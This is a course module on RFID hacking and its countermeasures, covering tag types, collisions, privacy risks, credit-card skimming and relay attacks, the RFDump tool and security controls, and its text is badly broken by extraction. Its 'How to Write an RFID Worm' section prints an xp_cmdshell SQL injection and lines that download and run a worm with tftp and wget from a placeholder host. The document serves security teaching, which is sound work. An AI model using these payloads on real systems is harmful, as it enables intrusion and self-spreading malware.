Ethical H ackin g an d

Coun term easures Coun term easures Version 6

  Mo d u le XXXIX RFID H ackin g News Source: http:/ / w w w .theregister.co.uk/

  Module Objective

This m odule will fam iliarize you with: y

• RFID
• Com pon en ts of RFID system s Com pon en ts of RFID system s
• RFID System Architecture • RFID Collision s
• RFID Risks RFID Risks • RFID an d Privacy Issues • RFID Security an d Privacy Threats • Vuln erabilities in RFID-en abled Credit Cards Vuln erabilities in RFID en abled Credit Cards • RFID H ackin g Tool • RFID Security Con trols

Module Flow

  RFID RFID an d Privacy Issues

  Com pon en ts of RFID system s

  RFID Security an d Privacy Threats RFID system s

  RFID System Architecture Privacy Threats

  Vuln erabilities in RFID System Architecture

  RFID-en abled Credit Cards RFID Collision s

  RFID H ackin g Tool RFID Risks

  RFID Security Con trols RFID Radio Frequen cy Iden tification (RFID) is an autom atic iden tification m ethod m ethod It tran sm its iden tity of an object in the form of a un ique serial n um ber usin g radio waves g RFID system s work on the prin ciple of con tactless tran sfer of data between data carryin g device an d its reader

  RFID

RFID tags con tain at least two parts:

• • In tegrated circuit to store an d process in form ation , m odulate, an d

  dem odulate an (RF) sign al
• An An ten n a for receivin g an d tran sm ittin g sign al An An ten n a for receivin g an d tran sm ittin g sign al

  Com pon en ts of RFID System s

Basic com pon en ts of a RFID system s: system s:

• Tags • Tag readers
• RFID an ten n a RFID an ten n a
• RFID con troller
• RFID prem ises server
• RFID in tegration server

Gen eral categories of RFID tags:

• Pa s s ive : Requires n o in tern al power source P i R q i i t l
• Active : Requires in tern al power source

  (Sm all battery)

• S e m i-p a s s ive ( Ba tte ry-a s s is te d ) :

  Requires in tern al power source(Sm all Requires in tern al power source(Sm all battery)

  RFID Collision s RFID Tag Collision : g

• RFID Tag collision happen s when m ultiple tags are en ergized by RFID tag reader sim ultan eously, an d reflect their respective sign als back to reader at the reflect their respective sign als back to reader at the sam e tim e

  RFID Reader Collision : RFID Reader Collision :

• Reader collision occurs in RFID system s when coverage area of on e RFID reader overlaps with coverage area of on e RFID reader overlaps with that of an other reader
• This causes two differen t proble>Sign al in terferen ce
• Multiple reads of sam e tag M l i l d f

  RFID Risks Busin ess Process Risk Busin ess In telligen ce Risk Busin ess In telligen ce Risk Privacy Risk Extern ality Risk

• H azards of Electrom agn etic Radiation H azards of Electrom agn etic Radiation • Com puter Network Attacks

RFID Risks: Busin ess Process Risk Risk

  Direct attacks on RFID system com pon en ts poten tially could un derm in e busin ess processes, which the RFID system was design ed to en able processes which the RFID system was design ed to en able RFID system s typically are im plem en ted to replace or en han ce a paper or partially autom ated process Organ ization s im plem en tin g RFID system s could becom e relian t on those system s Failure in an y com pon en t or subsystem of RFID system could result in system wide failure Un like m ost of other risks, busin ess process risk can occur as a result of both hum an action an d n atural causes If n etwork supportin g RFID system is down , then RFID system is likely to be down as well

  RFID Risks: Busin ess In telligen ce Risk In telligen ce Risk RFID supports wireless rem ote access to get in form ation about assets an d pp g people that either previously did n ot exist or was difficult to create or dyn am ically m ain tain A com petitor or adversary can gain in form ation from RFID system in a n um ber of ways:

• Eavesdroppin g on RF lin ks between readers an d tags
• Perform in g in depen den t queries on tags to obtain relevan t data
• Obtain in g un authorized access to a back-en d database which stores in form ation g about tagged item s

  

Usin g con trols such as database access con trols, password-protection , an d

cryptography can sign ifican tly m itigate busin ess in telligen ce risk if applied cryptography can sign ifican tly m itigate busin ess in telligen ce risk if applied

properly

RFID Risks: Privacy Risk

  Busin ess objectives often con flict with privacy objectives j p y j Organ ization s can ben efit from an alysis an d sharin g of person al in form ation obtain ed with RFID techn ology b gy Privacy risk from the perspective of organ ization Privacy risk from the perspective of organ ization im plem en tin g RFID, m ight in clude:

• Pen alties if organ ization does n ot com ply with privacy laws an d regulation s • Pen alties if organ ization does n ot com ply with privacy laws an d regulation s
• Custom er avoidan ce or boycott of organ ization because of real or perceived privacy con cern s about RFID techn ology
• Bein g held legally liable for an y con sequen ces of weak privacy protection s
• Em ployees, shareholders, an d other stakeholders m ight disassociate with Em ployees, shareholders, an d other stakeholders m ight disassociate with organ ization due to con cern s about corporate social respon sibility

  privacy risk in clude: gg p

  RFID Risks: Privacy Risk (con t’d) Other factors that im pact the level of privacy risk in clude:

• Whether person al in form ation is stored on tags
• Whether tagged item s are con sidered person al
>

• The likelihood that the tag will be in proxim ity of com patible

readers
• Len gth of tim e records are retain ed in an alytic or archival system s system s
• Effectiven ess of RFID security con trols, in particu>Efficien cy of tag m em ory access con trol an d authen tication m echan ism s ec a s s

• • Ability of tags to be disabled after their use in a busin ess

  process
• Ability of users to effectively shield tags to preven t th i d d t ti un authorized read tran saction s

  RFID Risks: Extern ality Risk RFID system s typically are n ot isolated from other system s an d assets in RFID system s typically are n ot isolated from other system s an d assets in en terprise Extern ality risks can exploit both RF an d en terprise subsystem s of an RFID system :

• Major extern ality risk for RF subsystem is hazards resultin g from electrom agn etic radiation
• Major extern ality risk for en terprise subsystem is com puter n etwork attacks on n etworked devices an d application s t k d d i d li ti

  As extern ality risk by defin ition in volves risks outside of RFID system ; it is distin ct for both busin ess process an d busin ess in telligen ce risks distin ct for both busin ess process an d busin ess in telligen ce risks

  RFID an d Privacy Issues An y organ ization con tem platin g the use of RFID should first y g p g en sure that it is aware of its privacy obligation s un der differen t laws before it starts accum ulatin g data

RFID attacks used to bypass person al privacy in form ation are:

• By placin g RFID tags hidden from eyes, an d usin g it for stealth trackin g
• Usin g un ique iden tifiers provided by RFID for profilin g and U i iq id tifi id d b RFID f fili d iden tifyin g con sum er pattern an d behavior
• Usin g hidden readers for stealth trackin g an d gettin g person al in form ation

  Coun term easures Methods that are used to avoid RFID attacks: RSA Blocker Tags: g

• It helps in m ain tain in g the privacy of con sum er by spam m in g from an y reader who attem pts to scan tags without the authorization

  Kill Switches: Kill S i h

• Newer RFID tags are bein g shipped with a Kill Switch, which allows RFID tags to be disabled

RFID Security an d Privacy Threats

  Sn iffin g Trackin g Spoofin g Spoofin g Replay attacks Den ial-of-service

Sn iffin g

  RFID tags are design ed to be readable by an y com plian t reader RFID t d i d t b d bl b li t d It is easy to collect RFID data by eavesdroppin g on wireless RFID chan n el Un restricted access to tag data can have serious im plication s Collected tag data m ight reveal in form ation such as m edical

predisposition s or un usual person al in clin ation s, causin g den ial of predisposition s or un usual person al in clin ation s causin g den ial of

in suran ce coverage or em ploym en t for an in dividual

Trackin g

  RFID techn ology facilitates secret m on itorin g of in dividual s location RFID techn ology facilitates secret m on itorin g of in dividual’s location an d action s

RFID readers placed in strategic location s can record RFID tag’s un ique

respon ses, this can then be persisten tly associated with a person ’s iden tity RFID tags without un ique iden tifiers facilitates trackin g by form in g

con stellation m ean s recurrin g groups of tags that are associated with an con stellation m ean s recurrin g groups of tags that are associated with an

in dividual

Spoofin g

  Attackers can m im ic authen tic RFID tags by Attackers can m im ic authen tic RFID tags by writin g appropriately form atted data on blan k RFID tags Tag clon in g is an other kin d of spoofin g attack which produces un authorized copies attack, which produces un authorized copies of legitim ate RFID tags

  Researchers from J ohn s H opkin s Un iversity recen tly clon ed a cryptographically- protected Texas In strum en ts digital i d sign ature tran spon der

Replay Attacks

  RFID relay devices can in tercept an d retran sm it RFID queries, which e ay de ces ca te cept a d et a s t que es, c offen ders can use to abuse various RFID application s En glan d’s n ew RFID-en abled licen se plates, e-Plates is an exam ple of m odern RFID system that is susceptible to attack by a relay device Active e-Plate tags con tain an en crypted ID code that is stored in UK Min istry of Tran sport’s vehicle database An attacker can record en crypted iden tifier when an other car’s licen se plate is scan n ed an d replay it later li l i d d l i l

Den ial-of-service

  Thieves can exploit RFID tags an d back-en d databases to steal RFID- hi l i d b k d d b l tagged item s by rem ovin g tags from the item s com pletely or by puttin g them in a foil lin ed booster bag that blocks RFID readers q query sign als an d tem porarily deactivates the item s y g p y An other attack takes the opposite approach; floods an RFID system pp pp ; y with m ore data than it can han dle Attacker can rem ove RFID tags an d plan t them on other item s, causin g RFID system s to record useless data, discreditin g, an d devaluin g RFID techn ology g gy

  Protection again st RFID Attacks Cryptography:

• Min im alist cryptography
• H um an -com puter authen tication
• H ash locks

  Detection an d evasion :

• RFID Detektor (http:/ / tin yurl.com / )
• Data Privatizer (https:/ / shop.foebud.org/ ) • Data Privatizer (https:/ / shop foebud org/ )
• RFID Guardian (www.rfidguardian .org)

  Tem porary Deactivation :

• Con sum ers can deactivate their RFID tags to avoid m ost m odern -day threats

  Other techn iques:

• Periodically m odification of RFID tag iden tifiers’ appearan ce an d data

RFID Guardian

  RFID Guardian is a m obile battery-powered device that offers person al RFID security an d privacy m an agem en t for people RFID Guardian m on itors an d regulates RFID usage on behalf of custom ers It is m ean t for person al use an d m an ages the RFID tags within physical proxim ity of a person It It acts like an RFID reader, queryin g tags, an d decodin g the tag respon ses, an d it can also t lik RFID d q i t d d di th t d it l em ulate an RFID tag, allowin g it to perform direct in -ban d com m un ication s with other RFID readers RFID Guardian is the in tegration of four separate security RFID Guardian is the in tegration of four separate security properties in to a sin gle device:

• Auditin g
• Key m an agem en t
• Access con trol
• Authen tication

  RFID Malware RFID m alware is tran sm itted an d executed via RFID tag:

• Threats arise when crim in als cause valid RFID tags to behave in an un expected ways
• If certain vuln erabilities exist in RFID software, an RFID tag can be in fected with a virus
• When an un suspectin g reader scan s an in fected tag, there is a dan ger of tag exploitin g a vuln erability

Classes of RFID Malware:

  Classes of RFID Malware:

• RFID Exploit:
• It is a m alicious RFID tag data that exploits som e vuln erabilities of RFID system
>RFID Worm :
• It is an RFID-based exploit that abuses a n etwork con n ection to achieve self-replica
• RFID Virus:
• It is an RFID-based exploit that auton om ously self-replicates its code to n ew RFID tags, without requirin g a n etwork con n ection

  It i RFID b d l it th t t l lf li t it d t

  H ow to Write an RFID Virus Viruses perform s two types of fun ction s, it replicates itself usin g database an d option ally it executes pay load p y p y Broadly there are two types of virus replication :

  Replication Usin g Self-Referen tial Queries

• Database system s usually offer a way to obtain curren t run n in g queries for system adm in istration purposes
• In two version s of virus, on e con tain s sin gle query an d other con tain s m ultiple queries In two version s of virus, on e con tain s sin gle query an d other con tain s m ultiple queries
• Sin gle query virus requires less features from database, but can n ot carry SQL code as a payload
• Whereas m ultiple queries require a database that supports SQL load as a payload

  R Replication Usin g Quin es li i U i Q i

• Quin e is a program that prin ts its own source code
• It copies its own source code in to database then it is latter copied on to tags
• Quin e requires m ultiple queries, which m ean s they are n ot supported on all databases
• They allow SQL code to be executed as a payload

  H ow to Write an RFID Worm

Worm is a program that self-propagates across a n etwork, exploitin g o s a p og a t at se p opagates ac oss a et o , e p o t g

security flaws in widely-used services A RFID An RFID worm propagates by exploitin g security flaws in on lin e b l i i i fl i li RFID services RFID worm s do n ot require users to do an y thin g to propagate, although they spread via RFID tags, if given the opportun ity

• RFID tags are too sm all to carry en tire worm

  

Propagation : • Tag con tain s on ly en ough of worm to down load the

rest from the com puter con n ected to In tern et rest from the com puter con n ected to In tern et

  H ow to Write an RFID Worm (con t d) (con t’d)

RFID tag can either in clude bin ary code to down load an d execute worm or shell

com m an ds Exam ple 1 - Executin g shell com m an ds usin g SQL Server Apples'; EXEC Master..xp_cmdshell 'shell commands'; Exam ple 2 - Down loadin g an d executin g a worm on Win dows cd \Windows\Temp & tftp -i <ip> GET worm.exe & worm.exe Exam ple 3 - Down loadin g an d executin g a worm on Lin ux usin g SSI <!--#exec cmd="wget http://ip/worm -O /tmp/worm; chmod +x /tmp/worm; /tmp/worm /tmp/worm; /tmp/worm "--> >

  Defen din g Again st RFID Malware Malware Lock down RFID user accoun ts an d database accoun ts Disable or rem ove an y features that are n ot required To avoid SQL in jection :

• An y data that is copied in to a SQL statem en t should be checked an d escaped usin g the An y data that is copied in to a SQL statem en t should be checked an d escaped usin g the fun ction s provided by database API
• For better security, do n ot copy data in to SQL statem en ts, but use prepared statem en ts an d param eter bin din g

  Clien t-side scriptin g can be preven ted by properly escapin g data in serted in to Clien t-side scriptin g can be preven ted by properly escapin g data in serted in to H TML pages Buffer overflows can be preven ted by properly checkin g buffer boun ds Buffer overflows can be preven ted by properly checkin g buffer boun ds

  RFID Exploits SQL In jection : Q j

• If RFID m iddleware does n ot process the data read from the tag correctly, it is possible to exploit this vuln erability of database by executin g SQL code that is stored on the tag of database by executin g SQL code that is stored on the tag

  Clien t-side Scriptin g:

• Exploitin g dyn am ic features offered by m odern browsers,

  The World's First by in cludin g J avaScript code on the tag RFID Chip In fected with a Virus i h Vi

  Buffer Overflow:

• Exploitin g lim ited m em ory of RFID tag by readin g m ore E l iti li it d f RFID t b di data than expected, causin g its buffer to overflow

  Vuln erabilities in RFID-en abled Credit Cards Credit Cards Trackin g Attack Trackin g Attack

• In this attack, a legitim ate m erchan t exceeds the expected use of his/ her RFID credit card readers of his/ her RFID credit card readers

Eavesdroppin g Attack

• In an eavesdroppin g attack, an adversary uses an an ten n a to record com m un ication between a legitim ate RF device an d reader d
• As eavesdroppin g happen s on live com m un ication ; foil shieldin g does n ot help to preven t this particular attack
• Eavesdroppin g feasibility depen ds on m an y factors in cludin g read distan ce d di

  Vuln erabilities in RFID-en abled Credit Cards (con t d) Credit Cards (con t’d)

Skim m in g Attack Ski i A k

• In this attack, an un authorized an d poten tially clan destin e reader reads tags from either close proxim ity or from a distan ce g p y
• J ohn n y Carson attack on RFID credit cards occurs when an attacker has access to physical m ail stream to read RF data from credit cards in tran sit to their own ers
• This attack is particularly powerful because the adversary gain s p y p

  y g accessory kn owledge such as cardholder address

• A com prom ised reader at a parkin g garage could skim custom er’s credit-card in form ation at sam e tim e that they read the parkin g pass
• Fob-type RFID credit cards are n ow available for attachm en t to key rin gs, exposin g them to attack when con sum ers leave their keys h k h l h k un atten ded
• This behavior is seen m ost often in valet-parkin g situation s, or in gym n asium s where it is com m on for users to leave their keys together in an un secured box by the door in an un secured box by the door

  Vuln erabilities in RFID-en abled Credit Cards (con t’d) Credit Cards (con t d) Replay an d relay Attack

• In a replay attack, an attacker broadcasts an exact replay of the tran spon der en d of the radio sign al recorded from a past tran saction between an Rfdevice an d a reader
• This attack, com m on ly kn own as the relay attack, uses a m an in the m iddle • This attack com m on ly kn own as the relay attack uses a m an in the m iddle attack to relay an tran sien t con n ection from a legitim ate reader through on e or m ore adversarial devices to a legitim ate tag which m ay be at a con siderable distan ce
• The distan ce at which the relay attack can succeed is lim ited on ly by the laten cy which will be tolerated by the attacked protocol hi h ill b l d b h k d l

Cross con tam in ation Attack

• The cross con tam in ation attack occurs when private in form ation such as cardholder n am e, n um ber, an d expiration date learn ed by an attacker in an RF con text are then used by the attacker in a differen t con text
• The attacker can use this data to create a m agstripe card, re-en code the stripe on an existin g card, or use these data in a card-n ot-presen t tran saction such as on an existin g card or use these data in a ‘card-n ot-presen t’ tran saction such as a telephon e or on lin e m ail-order purchase

  

RFID H ackin g Tool RFID H ki T l

RFDum p

  RFDum p is a tool that allows you to read RFID tags within range, an d to chan ge p y g g , g an d alter all the data stored in the RFID tag RFDum p is a backen d GPL tool to directly in teroperate with an y RFID ISO- Reader to m ake the con ten ts stored on RFID tags accessible The user data can be displayed an d m odified usin g an H ex an d either an ASCII editor RFDum p works with the ACG m ulti-tag reader or sim ilar card reader hardware

  RFDum p: Screen shot 1

  RFDum p: Screen shot 2 RFID Security Con trols

  Man agem en t Con trols A m an agem en t con trol in volves oversight of the security of the RFID system A m an agem en t con trol in volves oversight of the security of the RFID system The m an agem en t of an organ ization m ight n eed to update existin g policies to address RFID im plem en tation s

Man agem en t con trols are typically in volved in risk assessm en t, system plan n in g,

an d system acquisition , as well as security certification s, accreditation s, and an d system acquisition as well as security certification s accreditation s an d assessm en ts

The m an agem en t con trols for RFID system s: The m an agem en t con trols for RFID system s:

• RFID Usage Policy • IT Security Policies • Agreem en ts with Extern al Organ ization s A t ith E t l O i ti
• Min im izin g Sen sitive Data Stored on Tags

  Operation al Con trols An operation al con trol in volves the action s perform ed on a daily basis by the system ’s adm inistrators and users t ’ d i i t t d

There are several types of operation al con trols:

• Physical access con trols restrict access to authorized person n el where Physical access con trols restrict access to authorized person n el where the RFID system s are deployed
• Proper placem en t of RF equipm en t helps to avoid in terferen ce an d reduce hazards from electrom agn etic radiation
• Organ ization s can destroy tags after they are n o lon ger useful to preven t adversaries from gain in g access to their data d i f i i h i d
• Operator train in g en sures that person n el usin g the system follow appropriate guidelin es an d policies
• In form ation labels an d n otice can in form users of the in ten ded purposes of the RFID system an d sim ple m ethods users can em ploy to purposes of the RFID system an d sim ple m ethods users can em ploy to m itigate risk

Techn ical Con trols

  

A techn ical con trol uses techn ology to m on itor or restrict the action s that can be

perform ed within the system perform ed within the system Techn ical con trols are listed specifyin g the stan dards while others are available on ly in proprietary system s Man y techn ical con trols related to a tag require the tag to perform addition al com putation s an d to have addition al volatile m em ory Techn ical con trols exist for all com pon en ts of RFID system s, in cludin g the RF, Techn ical con trols exist for all com pon en ts of RFID system s in cludin g the RF en terprise, an d in ter-en terprise subsystem s

The gen eral types of RF subsystem con trols in clude con trols to: con trols to:

• Provide authen tication an d in tegrity services to RFID com pon en ts an d tran saction s
• Protect RF com m un ication between reader an d tag Protect RF com m un ication between reader an d tag
• Protect the data stored on tags

  RFID Security

  The tags can be set to have a security bit turn ed on in reserved m em ory block on the tag Ran dom tran saction IDs should be presen t on rewritable tags Im proved passwords via persisten t state Mutual authen tication of tag an d reader with privacy for the tag M l h i i f d d i h i f h

• PRF Private Authen tication Schem e
• TreeBased Private Authen tication
• A TwoPhase Tree Schem e A T Ph T S h Security to protect the read-write option s
• Password protected • Password protected

Sum m ary

  Radio Frequen cy Iden tification (RFID) is an autom atic iden tification m ethod RFID tag is an electron ic device that holds data An RFID reader is a device that is used to in terrogate an RFID tag RFID station s can read an d update in form ation stored in to the RFID tag RFID stan dards defin e Air In terface Protocol, Data Con ten t, Con form an ce, an d Application s The protective m easures again st RFID attacks are Cryptography, Detection an d evasion , The protective m easures again st RFID attacks are Cryptography, Detection an d evasion , Tem porary Deactivation , an d Other techn iques